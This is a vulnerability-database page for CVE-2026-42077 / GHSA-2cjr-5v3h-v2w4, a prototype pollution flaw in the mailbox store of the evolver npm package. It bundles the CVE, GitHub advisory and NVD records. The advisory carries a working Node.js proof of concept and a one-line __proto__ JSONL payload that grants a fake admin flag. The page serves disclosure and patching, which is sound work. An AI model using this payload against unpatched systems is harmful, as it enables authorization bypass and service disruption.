Vulnerability-Lookup

CVE-2026-42077 (GCVE-0-2026-42077)

Vulnerability from cvelistv5 – Published: 2026-05-04 16:50 – Updated: 2026-05-06 13:40

Title

Evolver: Prototype Pollution via `Object.assign()` in mailbox store operations

Summary

Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a prototype pollution vulnerability in the mailbox store module allows attackers to modify the behavior of all JavaScript objects by injecting malicious properties into Object.prototype. The vulnerability exists in the _applyUpdate() and _updateRecord() functions which use Object.assign() to merge user-controlled data without filtering dangerous keys like __proto__, constructor, or prototype. This issue has been patched in version 1.69.3.

Severity ?

5.2 (Medium)


                        
                          CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H

CWE

CWE-1321 - Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/EvoMap/evolver/security/adviso…	x_refsource_CONFIRM
	https://github.com/EvoMap/evolver/releases/tag/v1.69.3	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	EvoMap	evolver	Affected: < 1.69.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-42077",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-06T13:40:45.787015Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-06T13:40:54.808Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "evolver",
          "vendor": "EvoMap",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.69.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a prototype pollution vulnerability in the mailbox store module allows attackers to modify the behavior of all JavaScript objects by injecting malicious properties into Object.prototype. The vulnerability exists in the _applyUpdate() and _updateRecord() functions which use Object.assign() to merge user-controlled data without filtering dangerous keys like __proto__, constructor, or prototype. This issue has been patched in version 1.69.3."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 5.2,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-1321",
              "description": "CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-04T16:50:15.167Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4"
        },
        {
          "name": "https://github.com/EvoMap/evolver/releases/tag/v1.69.3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/EvoMap/evolver/releases/tag/v1.69.3"
        }
      ],
      "source": {
        "advisory": "GHSA-2cjr-5v3h-v2w4",
        "discovery": "UNKNOWN"
      },
      "title": "Evolver: Prototype Pollution via `Object.assign()` in mailbox store operations"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-42077",
    "datePublished": "2026-05-04T16:50:15.167Z",
    "dateReserved": "2026-04-23T19:17:30.565Z",
    "dateUpdated": "2026-05-06T13:40:54.808Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-42077",
      "date": "2026-05-06",
      "epss": "0.00014",
      "percentile": "0.02712"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-42077\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-04T17:16:24.587\",\"lastModified\":\"2026-05-06T15:16:11.000\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a prototype pollution vulnerability in the mailbox store module allows attackers to modify the behavior of all JavaScript objects by injecting malicious properties into Object.prototype. The vulnerability exists in the _applyUpdate() and _updateRecord() functions which use Object.assign() to merge user-controlled data without filtering dangerous keys like __proto__, constructor, or prototype. This issue has been patched in version 1.69.3.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H\",\"baseScore\":5.2,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":0.5,\"impactScore\":4.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1321\"}]}],\"references\":[{\"url\":\"https://github.com/EvoMap/evolver/releases/tag/v1.69.3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-42077\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-06T13:40:45.787015Z\"}}}], \"references\": [{\"url\": \"https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-06T13:38:42.448Z\"}}], \"cna\": {\"title\": \"Evolver: Prototype Pollution via `Object.assign()` in mailbox store operations\", \"source\": {\"advisory\": \"GHSA-2cjr-5v3h-v2w4\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.2, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"EvoMap\", \"product\": \"evolver\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.69.3\"}]}], \"references\": [{\"url\": \"https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4\", \"name\": \"https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/EvoMap/evolver/releases/tag/v1.69.3\", \"name\": \"https://github.com/EvoMap/evolver/releases/tag/v1.69.3\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a prototype pollution vulnerability in the mailbox store module allows attackers to modify the behavior of all JavaScript objects by injecting malicious properties into Object.prototype. The vulnerability exists in the _applyUpdate() and _updateRecord() functions which use Object.assign() to merge user-controlled data without filtering dangerous keys like __proto__, constructor, or prototype. This issue has been patched in version 1.69.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-1321\", \"description\": \"CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-04T16:50:15.167Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-42077\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-06T13:40:54.808Z\", \"dateReserved\": \"2026-04-23T19:17:30.565Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-04T16:50:15.167Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-2CJR-5V3H-V2W4

Vulnerability from github – Published: 2026-04-22 22:05 – Updated: 2026-05-04 19:54

Summary

Evolver has Prototype Pollution via `Object.assign()` in its mailbox store operations

Details

Summary

A prototype pollution vulnerability in the mailbox store module allows attackers to modify the behavior of all JavaScript objects by injecting malicious properties into Object.prototype. The vulnerability exists in the _applyUpdate() and _updateRecord() functions which use Object.assign() to merge user-controlled data without filtering dangerous keys like __proto__, constructor, or prototype.

Details

The vulnerability exists in src/proxy/mailbox/store.js at lines 123 and 145:

// src/proxy/mailbox/store.js:115-128
_applyUpdate(row) {
  if (row._op === 'update') {
    const existing = this._index[row.id];
    // VULNERABLE: Direct Object.assign without key filtering
    if (existing) Object.assign(existing, row.fields);
    else this._index[row.id] = row.fields;
  }
  // ...
}

// src/proxy/mailbox/store.js:138-150
_updateRecord(id, fields) {
  const existing = this._index[id];
  // VULNERABLE: Direct Object.assign without key filtering
  if (existing) Object.assign(existing, fields);
  // ...
}

The vulnerability can be triggered when an attacker has the ability to write to the messages.jsonl file (used for mailbox persistence). By crafting a malicious JSONL entry with __proto__ as a field key, the attacker can pollute the prototype of all objects.

The data flows from: 1. messages.jsonl file → 2. readLines() function (line 47) → 3. _rebuildIndex() (line 113) → _applyUpdate() (line 121) → 4. Object.assign() pollutes prototype

PoC

Prerequisites: - Node.js installed - Access to write to the mailbox messages file

Steps to reproduce:

Create a test file demonstrating the vulnerability:

// test-prototype-pollution.js
const fs = require('fs');
const path = require('path');

// Simulate the vulnerable Store class logic
class VulnerableStore {
  constructor(filePath) {
    this.filePath = filePath;
    this._index = {};
  }

  load() {
    if (!fs.existsSync(this.filePath)) return;
    const lines = fs.readFileSync(this.filePath, 'utf8').split('\n');
    for (const line of lines) {
      if (!line.trim()) continue;
      try {
        const row = JSON.parse(line);
        this._applyUpdate(row);
      } catch (e) {
        // Ignore parse errors
      }
    }
  }

  _applyUpdate(row) {
    if (row._op === 'update') {
      const existing = this._index[row.id];
      // VULNERABLE: No filtering of dangerous keys
      if (existing) Object.assign(existing, row.fields);
      else this._index[row.id] = row.fields;
    }
  }

  update(id, fields) {
    this._updateRecord(id, fields);
  }

  _updateRecord(id, fields) {
    const existing = this._index[id];
    // VULNERABLE: No filtering of dangerous keys
    if (existing) Object.assign(existing, fields);
    else this._index[id] = fields;
  }
}

// Test the vulnerability
console.log('=== Testing Prototype Pollution ===\n');

// Create a malicious messages.jsonl file
const maliciousContent = JSON.stringify({
  _op: 'update',
  id: 'msg-123',
  fields: {
    __proto__: {
      polluted: true,
      isAdmin: true
    },
    normalField: 'normalValue'
  }
}) + '\n';

const testDir = '/tmp/evolver-pollution-test';
if (!fs.existsSync(testDir)) fs.mkdirSync(testDir, { recursive: true });
const testFile = path.join(testDir, 'messages.jsonl');

fs.writeFileSync(testFile, maliciousContent);
console.log('Created malicious messages.jsonl');

// Load the store (this triggers the vulnerability)
const store = new VulnerableStore(testFile);
store.load();

// Check if prototype was polluted
console.log('\n=== Checking for prototype pollution ===');
const testObj = {};
console.log('testObj.polluted:', testObj.polluted);
console.log('testObj.isAdmin:', testObj.isAdmin);

if (testObj.polluted === true) {
  console.log('\n🔴 VULNERABILITY CONFIRMED: Object prototype was polluted!');
  console.log('All objects now have "polluted" and "isAdmin" properties.');
} else {
  console.log('\n🟡 Prototype pollution may require different payload structure');
}

// Demonstrate impact - bypassing authentication check
console.log('\n=== Impact Demonstration ===');
function checkAdmin(user) {
  // Typical pattern that would be vulnerable
  if (user.isAdmin) {
    return 'Access granted - Admin privileges';
  }
  return 'Access denied';
}

const regularUser = { name: 'normal_user' };
console.log('Regular user check:', checkAdmin(regularUser));

// Cleanup
fs.rmSync(testDir, { recursive: true });

Run the test:

node test-prototype-pollution.js

Expected output:

=== Checking for prototype pollution ===
testObj.polluted: true
testObj.isAdmin: true

🔴 VULNERABILITY CONFIRMED: Object prototype was polluted!
All objects now have "polluted" and "isAdmin" properties.

=== Impact Demonstration ===
Regular user check: Access granted - Admin privileges

Note: Modern Node.js versions have some prototype pollution protections. For a successful exploit, the attacker might need to use alternative property paths like constructor.prototype.isAdmin.

Attack scenario: If an attacker can write to the mailbox messages file (e.g., through file upload, path traversal, or compromised backup restore), they can:

{"_op":"update","id":"malicious","fields":{"__proto__":{"isAdmin":true,"canExecuteArbitraryCode":true}}}

Impact

This is a Prototype Pollution vulnerability that can lead to: - Property injection affecting all JavaScript objects - Authentication/authorization bypass - Application logic manipulation - Denial of service via prototype corruption - Potential remote code execution if polluted properties affect security-critical code paths

Attack requirements: The attacker needs write access to the messages.jsonl file. This could be achieved through: - File upload vulnerabilities - Path traversal (combined with the Arbitrary File Write vulnerability in the fetch command) - Compromised backup files - Shared hosting environments

Affected users: Anyone using the mailbox functionality in multi-user environments or with persistent message storage.

Severity ?

5.2 (Medium)


                  
                    CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@evomap/evolver"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.69.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42077"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-22T22:05:28Z",
    "nvd_published_at": "2026-05-04T17:16:24Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nA prototype pollution vulnerability in the mailbox store module allows attackers to modify the behavior of all JavaScript objects by injecting malicious properties into `Object.prototype`. The vulnerability exists in the `_applyUpdate()` and `_updateRecord()` functions which use `Object.assign()` to merge user-controlled data without filtering dangerous keys like `__proto__`, `constructor`, or `prototype`.\n\n### Details\nThe vulnerability exists in `src/proxy/mailbox/store.js` at lines 123 and 145:\n\n```javascript\n// src/proxy/mailbox/store.js:115-128\n_applyUpdate(row) {\n  if (row._op === \u0027update\u0027) {\n    const existing = this._index[row.id];\n    // VULNERABLE: Direct Object.assign without key filtering\n    if (existing) Object.assign(existing, row.fields);\n    else this._index[row.id] = row.fields;\n  }\n  // ...\n}\n\n// src/proxy/mailbox/store.js:138-150\n_updateRecord(id, fields) {\n  const existing = this._index[id];\n  // VULNERABLE: Direct Object.assign without key filtering\n  if (existing) Object.assign(existing, fields);\n  // ...\n}\n```\n\nThe vulnerability can be triggered when an attacker has the ability to write to the `messages.jsonl` file (used for mailbox persistence). By crafting a malicious JSONL entry with `__proto__` as a field key, the attacker can pollute the prototype of all objects.\n\nThe data flows from:\n1. `messages.jsonl` file \u2192 \n2. `readLines()` function (line 47) \u2192 \n3. `_rebuildIndex()` (line 113) \u2192 `_applyUpdate()` (line 121) \u2192 \n4. `Object.assign()` pollutes prototype\n\n### PoC\n\n**Prerequisites:**\n- Node.js installed\n- Access to write to the mailbox messages file\n\n**Steps to reproduce:**\n\n1. Create a test file demonstrating the vulnerability:\n\n```javascript\n// test-prototype-pollution.js\nconst fs = require(\u0027fs\u0027);\nconst path = require(\u0027path\u0027);\n\n// Simulate the vulnerable Store class logic\nclass VulnerableStore {\n  constructor(filePath) {\n    this.filePath = filePath;\n    this._index = {};\n  }\n\n  load() {\n    if (!fs.existsSync(this.filePath)) return;\n    const lines = fs.readFileSync(this.filePath, \u0027utf8\u0027).split(\u0027\\n\u0027);\n    for (const line of lines) {\n      if (!line.trim()) continue;\n      try {\n        const row = JSON.parse(line);\n        this._applyUpdate(row);\n      } catch (e) {\n        // Ignore parse errors\n      }\n    }\n  }\n\n  _applyUpdate(row) {\n    if (row._op === \u0027update\u0027) {\n      const existing = this._index[row.id];\n      // VULNERABLE: No filtering of dangerous keys\n      if (existing) Object.assign(existing, row.fields);\n      else this._index[row.id] = row.fields;\n    }\n  }\n\n  update(id, fields) {\n    this._updateRecord(id, fields);\n  }\n\n  _updateRecord(id, fields) {\n    const existing = this._index[id];\n    // VULNERABLE: No filtering of dangerous keys\n    if (existing) Object.assign(existing, fields);\n    else this._index[id] = fields;\n  }\n}\n\n// Test the vulnerability\nconsole.log(\u0027=== Testing Prototype Pollution ===\\n\u0027);\n\n// Create a malicious messages.jsonl file\nconst maliciousContent = JSON.stringify({\n  _op: \u0027update\u0027,\n  id: \u0027msg-123\u0027,\n  fields: {\n    __proto__: {\n      polluted: true,\n      isAdmin: true\n    },\n    normalField: \u0027normalValue\u0027\n  }\n}) + \u0027\\n\u0027;\n\nconst testDir = \u0027/tmp/evolver-pollution-test\u0027;\nif (!fs.existsSync(testDir)) fs.mkdirSync(testDir, { recursive: true });\nconst testFile = path.join(testDir, \u0027messages.jsonl\u0027);\n\nfs.writeFileSync(testFile, maliciousContent);\nconsole.log(\u0027Created malicious messages.jsonl\u0027);\n\n// Load the store (this triggers the vulnerability)\nconst store = new VulnerableStore(testFile);\nstore.load();\n\n// Check if prototype was polluted\nconsole.log(\u0027\\n=== Checking for prototype pollution ===\u0027);\nconst testObj = {};\nconsole.log(\u0027testObj.polluted:\u0027, testObj.polluted);\nconsole.log(\u0027testObj.isAdmin:\u0027, testObj.isAdmin);\n\nif (testObj.polluted === true) {\n  console.log(\u0027\\n\ud83d\udd34 VULNERABILITY CONFIRMED: Object prototype was polluted!\u0027);\n  console.log(\u0027All objects now have \"polluted\" and \"isAdmin\" properties.\u0027);\n} else {\n  console.log(\u0027\\n\ud83d\udfe1 Prototype pollution may require different payload structure\u0027);\n}\n\n// Demonstrate impact - bypassing authentication check\nconsole.log(\u0027\\n=== Impact Demonstration ===\u0027);\nfunction checkAdmin(user) {\n  // Typical pattern that would be vulnerable\n  if (user.isAdmin) {\n    return \u0027Access granted - Admin privileges\u0027;\n  }\n  return \u0027Access denied\u0027;\n}\n\nconst regularUser = { name: \u0027normal_user\u0027 };\nconsole.log(\u0027Regular user check:\u0027, checkAdmin(regularUser));\n\n// Cleanup\nfs.rmSync(testDir, { recursive: true });\n```\n\n2. Run the test:\n```bash\nnode test-prototype-pollution.js\n```\n\n**Expected output:**\n```\n=== Checking for prototype pollution ===\ntestObj.polluted: true\ntestObj.isAdmin: true\n\n\ud83d\udd34 VULNERABILITY CONFIRMED: Object prototype was polluted!\nAll objects now have \"polluted\" and \"isAdmin\" properties.\n\n=== Impact Demonstration ===\nRegular user check: Access granted - Admin privileges\n```\n\n**Note:** Modern Node.js versions have some prototype pollution protections. For a successful exploit, the attacker might need to use alternative property paths like `constructor.prototype.isAdmin`.\n\n**Attack scenario:**\nIf an attacker can write to the mailbox messages file (e.g., through file upload, path traversal, or compromised backup restore), they can:\n```jsonl\n{\"_op\":\"update\",\"id\":\"malicious\",\"fields\":{\"__proto__\":{\"isAdmin\":true,\"canExecuteArbitraryCode\":true}}}\n```\n\n### Impact\nThis is a **Prototype Pollution** vulnerability that can lead to:\n- Property injection affecting all JavaScript objects\n- Authentication/authorization bypass\n- Application logic manipulation\n- Denial of service via prototype corruption\n- Potential remote code execution if polluted properties affect security-critical code paths\n\n**Attack requirements:** The attacker needs write access to the `messages.jsonl` file. This could be achieved through:\n- File upload vulnerabilities\n- Path traversal (combined with the Arbitrary File Write vulnerability in the fetch command)\n- Compromised backup files\n- Shared hosting environments\n\n**Affected users:** Anyone using the mailbox functionality in multi-user environments or with persistent message storage.",
  "id": "GHSA-2cjr-5v3h-v2w4",
  "modified": "2026-05-04T19:54:38Z",
  "published": "2026-04-22T22:05:28Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42077"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/EvoMap/evolver"
    },
    {
      "type": "WEB",
      "url": "https://github.com/EvoMap/evolver/releases/tag/v1.69.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Evolver has Prototype Pollution via `Object.assign()` in its mailbox store operations"
}

FKIE_CVE-2026-42077

Vulnerability from fkie_nvd - Published: 2026-05-04 17:16 - Updated: 2026-05-06 15:16

Severity ?

5.2 (Medium) - CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/EvoMap/evolver/releases/tag/v1.69.3
	security-advisories@github.com	https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a prototype pollution vulnerability in the mailbox store module allows attackers to modify the behavior of all JavaScript objects by injecting malicious properties into Object.prototype. The vulnerability exists in the _applyUpdate() and _updateRecord() functions which use Object.assign() to merge user-controlled data without filtering dangerous keys like __proto__, constructor, or prototype. This issue has been patched in version 1.69.3."
    }
  ],
  "id": "CVE-2026-42077",
  "lastModified": "2026-05-06T15:16:11.000",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 5.2,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 0.5,
        "impactScore": 4.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-04T17:16:24.587",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/EvoMap/evolver/releases/tag/v1.69.3"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-1321"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-42077 (GCVE-0-2026-42077)

GHSA-2CJR-5V3H-V2W4

Summary

Details

PoC

Impact

FKIE_CVE-2026-42077

Tags

Sightings

Nomenclature